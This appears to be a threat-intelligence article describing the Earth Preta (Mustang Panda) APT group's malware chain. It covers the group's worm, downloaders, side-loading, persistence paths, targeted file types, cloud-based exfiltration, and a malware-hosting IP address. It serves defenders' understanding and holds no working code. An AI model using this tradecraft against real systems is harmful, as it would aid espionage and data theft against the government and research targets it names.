The Earth Preta Advanced Persistent Threat (APT) group, recognized by various names such as Mustang Panda, Bronze President, RedDelta, and Red Lich, has been a prominent player in the realm of cyber-espionage since at least 2012. Primarily targeting government entities, academic institutions, foundations, and research sectors in the Asia-Pacific region, Earth Preta’s operational sophistication has continually evolved, reflecting their formidable capabilities.
A Shift from Classic Spear-Phishing to Advanced Malware Deployment
Historically reliant on spear-phishing tactics, Earth Preta has now transitioned to more elaborate strategies involving sophisticated malware deployment. The incorporation of a variant of the HIUPAN worm into their toolkit is a significant milestone. This worm facilitates the distribution of PUBLOAD via removable drives, empowering the group with the means to execute a multitude of tasks on compromised systems. The significance of PUBLOAD lies not only in its role in data gathering but also in its ability to exfiltrate data seamlessly using the cURL tool to FTP sites. This evolution underscores the group’s shift towards more covert and efficient techniques.
Supplementing this, Earth Preta employs additional tools to enhance their capabilities. FDMTP, which leverages TouchSocket over DMTP, functions as a secondary control tool and downloader, while PTSOCKET offers an alternative route for data exfiltration. These enhancements showcase a marked improvement in their operational agility and complexity. The meticulous selection and deployment of these tools indicate Earth Preta’s readiness to adapt and integrate innovative technologies, making their cyber attack campaigns more unpredictable and sophisticated.
Persistent Malware and Multi-Stage Attacks
For persistence, the HIUPAN worm installs itself and PUBLOAD within the C:ProgramDataIntel_ directory. This installation process includes the creation of autorun registry entries, ensuring the malware remains active even after system reboots. By strategically placing PUBLOAD in C:ProgramDataCocCocBrowser, the attackers can conduct network surveillance and execute critical system commands such as ‘ipconfig’, ‘netstat’, and ‘systeminfo’. This meticulous setup exemplifies Earth Preta’s commitment to maintaining a foothold in compromised systems, thereby enhancing their ability to continuously monitor and control their target environments.
The attackers exhibit particular interest in files with extensions such as .doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx. The deliberate selection of these file types points to their strategic objective of extracting valuable and sensitive information. The convergence of multi-stage attacks and targeted data theft techniques indicates an enhanced level of sophistication and precision in their operations. These attacks are not only highly orchestrated but also meticulously executed, reflecting the group’s substantial investment in both resources and expertise to ensure their success.
The Evolution of Initial Compromise Methods
Earth Preta’s operations typically begin with a spear-phishing email that includes a .url attachment. This attachment initiates a multi-stage process, starting with the execution of a signed downloader tool named “DOWNBAIT.” DOWNBAIT uses multi-layered XOR encryption to download a decoy document alongside PULLBAIT, a shellcode component. The sophistication of this method lies in PULLBAIT’s ability to download and execute CBROVER through DLL side-loading. CBROVER serves as the initial backdoor stage, paving the way for the deployment of PLUGX, a more advanced malware. This multi-stage approach underscores their intricate planning and technical prowess in penetrating target systems.
PLUGX, employed in a two-stage process, is safeguarded by RC4 encryption and the Data Protection API (DPAPI). This progressive deployment design demonstrates Earth Preta’s strategic emphasis on penetrating targets deeply and maintaining control over compromised environments. These advanced methods not only improve their chances of successful infiltration but also make detection and removal considerably more challenging for cybersecurity defenses, thus extending the lifecycle of their attacks.
Sophisticated Data Collection and Exfiltration Techniques
For data gathering, Earth Preta makes use of the RAR command-line tool or FILESAC, essentially a modified “FileSearchAndCompress” utility. These tools are finely tuned to extract specific file types within designated date ranges, optimizing the value of stolen data. The collected data is exfiltrated using Microsoft’s cloud services, such as OneDrive and Graph API, reflecting an advanced understanding of modern data handling platforms. This method provides a sophisticated and efficient means of transferring stolen data, enhancing their ability to operate discreetly under the radar of conventional security measures.
The use of a WebDAV server at IP address 16.162.188.93 to host malware and decoy documents forms the backbone of their operations. This infrastructure supports their evasion techniques, operational speed, and multi-stage attack processes, illustrating the depth of their tactical evolution. By leveraging such robust infrastructure, Earth Preta ensures they remain a resilient and formidable threat capable of performing high-stakes cyber espionage operations.
Conclusion
The Earth Preta Advanced Persistent Threat (APT) group, also known by various aliases such as Mustang Panda, Bronze President, RedDelta, and Red Lich, has been a significant force in cybersecurity threats since at least 2012. This group has a well-established reputation for engaging in cyber-espionage activities, focusing its attacks on a range of entities. Its primary targets include government agencies, academic institutions, foundations, and research sectors, mainly within the Asia-Pacific region. The operational sophistication of Earth Preta has steadily evolved over the years, showcasing their formidable capabilities and making them a persistent threat in the digital landscape.
Their tactics, techniques, and procedures have continually adapted to bypass security measures, incorporating advanced malware, phishing schemes, and exploiting zero-day vulnerabilities. The group’s dedication to their craft and their ability to adapt to new defense mechanisms underscore their status as a potent adversary in the cyber-espionage arena. Information security professionals must remain vigilant against such threats, understanding that Earth Preta’s activities represent a persistent and evolving risk to their targets.